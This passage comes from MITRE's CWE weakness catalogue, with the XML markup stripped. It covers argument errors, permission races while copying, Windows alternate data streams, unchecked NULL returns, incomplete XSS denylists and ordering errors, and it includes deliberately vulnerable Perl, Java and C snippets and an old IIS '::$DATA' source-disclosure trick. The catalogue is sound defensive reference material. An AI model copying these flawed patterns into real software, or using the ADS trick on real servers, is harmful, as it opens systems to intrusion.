+ updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses. + This weakness is most likely to occur in loosely typed languages, or in strongly typed languages in which the types of variable arguments cannot be enforced at compilation time, or where there is implicit casting. + + + + + + Primary + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Testing + Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the product. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. + + + + + EXP37-C + Call functions with the correct number and type of arguments + CWE More Specific + + + FIO47-C + Use valid format strings + Imprecise + + + POS34-C + Do not call putenv() with a pointer to an automatic variable as the argument + + + STR37-C + Arguments to character handling functions must be representable as an unsigned char + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses. + + + + + + Primary + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Manual Static Analysis + This might require an understanding of intended program behavior or design to determine whether the value is incorrect. + + + + + This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit. + + sub ReportAuth {my ($username, $result, $fatal) = @_;PrintLog("auth: username=%s, result=%d", $username, $result);if (($result ne "success") && $fatal) {die "Failed!\n";}} + sub PrivilegedFunc{my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();} + + + + + + MEM04-C + Do not perform zero length allocations + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + When primary, this weakness is most likely to occur in rarely-tested code, since the wrong value can change the semantic meaning of the program's execution and lead to obviously-incorrect behavior. It can also be resultant from issues in which the program assigns the wrong value to a variable, and that variable is later used in a function call. In that sense, this issue could be argued as having chaining relationships with many implementation errors in CWE. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses. + + + + + + Primary + + + + + + + + + Implementation + This problem typically occurs when the programmer makes a typo, or copy and paste errors. + + + + + Other + Quality Degradation + + + + + Other + While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in loosely typed languages or environments. This might require an understanding of intended program behavior or design to determine whether the value is incorrect. + + + + + Testing + Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the product. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. + + + + + In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles. + + private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);} + private boolean void accessGranted(String resource, String[] userRoles) { + + + // grant or deny access based on user roles + ... + } + + + + + + CVE-2005-2548 + Kernel code specifies the wrong variable in first argument, leading to resultant NULL pointer dereference. + https://www.cve.org/CVERecord?id=CVE-2005-2548 + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product, while copying or cloning a resource, does not set the resource's permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place. + + + + + + + + Primary + + + + + + + + + Implementation + + Common examples occur in file archive extraction, in which the product begins the extraction with insecure default permissions, then only sets the final permissions (as specified in the archive) once the copy is complete. The larger the archive, the larger the timing window for the race condition. + This weakness has also occurred in some operating system utilities that perform copies of deeply nested directories containing a large number of files. + This weakness can occur in any type of functionality that involves copying objects or resources in a multi-user environment, including at the application level. For example, a document management system might allow a user to copy a private document, but if it does not set the new copy to be private as soon as the copy begins, then other users might be able to view the document while the copy is still taking place. + + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + CVE-2002-0760 + Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified. + https://www.cve.org/CVERecord?id=CVE-2002-0760 + + + CVE-2005-2174 + Product inserts a new object into database before setting the object's permissions, introducing a race condition. + https://www.cve.org/CVERecord?id=CVE-2005-2174 + + + CVE-2006-5214 + Error file has weak permissions before a chmod is performed. + https://www.cve.org/CVERecord?id=CVE-2006-5214 + + + CVE-2005-2475 + Archive permissions issue using hard link. + https://www.cve.org/CVERecord?id=CVE-2005-2475 + + + CVE-2003-0265 + Database product creates files world-writable before initializing the setuid bits, leading to modification of executables. + https://www.cve.org/CVERecord?id=CVE-2003-0265 + + + + + + + + + + + Allowed + This is a Composite of multiple weaknesses that must all occur simultaneously. + While composites are supported in CWE, they have not been a focus of research. There is a chance that future research or CWE scope clarifications will change or deprecate them. Perform root-cause analysis to determine which weaknesses allow this issue to occur, and map to those weaknesses. For example, the delayed permission-setting in the resource copy might be intended functionality, but creation in a location with insecure permissions might not. + + + + + + Under-studied. It seems likely that this weakness could occur in any situation in which a complex or large copy operation occurs, when the resource can be made available to other spheres as soon as it is created, but before its initialization is complete. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly prevent access to, or detect usage of, alternate data streams (ADS). + An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and 'dir' at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork. + + + + + + + + + Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type. + + + + Implementation + + + + + Access Control + Non-Repudiation + Other + Bypass Protection Mechanism + Hide Activities + Other + + + + + Testing + Software tools are capable of finding ADSs on your system. + + + Implementation + Ensure that the source code correctly parses the filename to read or write to the correct stream. + + + + + CVE-1999-0278 + In IIS, remote attackers can obtain source code for ASP files by appending "::$DATA" to the URL. + https://www.cve.org/CVERecord?id=CVE-1999-0278 + + + CVE-2000-0927 + Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions. + https://www.cve.org/CVERecord?id=CVE-2000-0927 + + + + System Process + + + + Windows ::DATA alternate data stream + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Background_Details, Description, Relationships, Other_Notes, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Windows ::DATA Alternate Data Stream + Failure to Handle Windows ::DATA Alternate Data Stream + + + + The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference. + While unchecked return value weaknesses are not limited to returns of NULL pointers (see the examples in CWE-252), functions often return NULL to indicate an error status. When this error condition is not checked, a NULL pointer dereference can occur. + + + + + + + + + + + Implementation + A typical occurrence of this weakness occurs when an application includes user-controlled input to a malloc() call. The related code might be correct with respect to preventing buffer overflows, but if a large value is provided, the malloc() will fail due to insufficient memory. This problem also frequently occurs when a parsing routine expects that certain elements will always be present. If malformed input is provided, the parser might return NULL. For example, strtok() can return NULL. + + + + + Availability + DoS: Crash, Exit, or Restart + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Read Memory + Modify Memory + In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution. + + + + + Black Box + This typically occurs in rarely-triggered error conditions, reducing the chances of detection during black box testing. + + + White Box + Code analysis can require knowledge of API behaviors for library functions that might return NULL, reducing the chances of detection when unknown libraries are used. + + + + + The code below makes a call to the getUserName() function but doesn't check the return value before dereferencing (which may cause a NullPointerException). + + String username = getUserName();if (username.equals(ADMIN_USER)) {...} + + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). + Note that this code is also vulnerable to a buffer overflow (CWE-119). + + + + + CVE-2008-1052 + Large Content-Length value leads to NULL pointer dereference when malloc fails. + https://www.cve.org/CVERecord?id=CVE-2008-1052 + + + CVE-2006-6227 + Large message length field leads to NULL pointer dereference when malloc fails. + https://www.cve.org/CVERecord?id=CVE-2006-6227 + + + CVE-2006-2555 + Parsing routine encounters NULL dereference when input is missing a colon separator. + https://www.cve.org/CVERecord?id=CVE-2006-2555 + + + CVE-2003-1054 + URI parsing API sets argument to NULL when a parsing failure occurs, such as when the Referer header is missing a hostname, leading to NULL dereference. + https://www.cve.org/CVERecord?id=CVE-2003-1054 + + + CVE-2008-5183 + chain: unchecked return value can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-5183 + + + + + EXP34-C + Do not dereference null pointers + CWE More Specific + + + ERR08-J + Do not catch NullPointerException or any of its ancestors + + + EXP32-PL + Do not ignore function return values + CWE More Specific + + + + Discouraged + This CWE entry is a named chain, which combines multiple weaknesses. + Mapping to each separate weakness in the chain would be more precise. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Relevant_Properties, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways. + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Alter Execution Logic + + + + + 40 + Insufficient Process Validation + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. However, classification research is limited for weaknesses of this type, so there can be gaps or organizational difficulties within CWE that force use of this weakness, even at such a high level of abstraction. + Where feasible, consider children or descendants of this entry instead. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Maintenance_Notes, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed. + While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The "XSS Cheat Sheet" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists. + + + + + + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + CVE-2007-5727 + Denylist only removes <SCRIPT> tag. + https://www.cve.org/CVERecord?id=CVE-2007-5727 + + + CVE-2006-3617 + Denylist only removes <SCRIPT> tag. + https://www.cve.org/CVERecord?id=CVE-2006-3617 + + + CVE-2006-4308 + Denylist only checks "javascript:" tag + https://www.cve.org/CVERecord?id=CVE-2006-4308 + + + + + + + + + + + + + + Discouraged + This CWE entry is a named chain, which combines multiple weaknesses. + Mapping to each separate weakness in the chain would be more precise. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-09-24 + added Language_Class "All" + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Description, Other_Notes + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Name, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Incomplete Blacklist to Cross-Site Scripting + + + + The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product. + This weakness covers three distinct situations. A "missing" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An "insufficient" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an "ignored" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path. + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Access Control + Bypass Protection Mechanism + + + + + + + + + + + + + + + + + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. + Consider children or descendants of this entry instead. + + + + + + The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Maintenance_Notes, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses multiple resources that can have the same identifier, in a context in which unique identifiers are required. + If the product assumes that each resource has a unique identifier, the product could operate on the wrong resource if attackers can cause multiple resources to be associated with the same identifier. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + If unique identifiers are assumed when protecting sensitive resources, then duplicate identifiers might allow attackers to bypass the protection. + + + Other + Quality Degradation + + + + + Architecture and Design + Where possible, use unique identifiers. If non-unique identifiers are detected, then do not operate any resource with a non-unique identifier and report the error appropriately. + + + + + CVE-2013-4787 + chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive. + https://www.cve.org/CVERecord?id=CVE-2013-4787 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is probably closely associated with other issues related to doubling, such as CWE-675 (Duplicate Operations on Resource). It's often a case of an API contract violation (CWE-227). + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relevant_Properties + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses low-level functionality that is explicitly prohibited by the framework or specification under which the product is supposed to operate. + The use of low-level functionality can violate the specification in unexpected ways that effectively disable built-in protection mechanisms, introduce exploitable inconsistencies, or otherwise expose the functionality to attack. + + + + + + Implementation + + + + + Other + Other + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses. + + + + + + Primary + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Alter Execution Logic + + + + + CVE-2019-9805 + Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption. + https://www.cve.org/CVERecord?id=CVE-2019-9805 + + + CVE-2007-5191 + file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges + https://www.cve.org/CVERecord?id=CVE-2007-5191 + + + CVE-2007-1588 + C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs 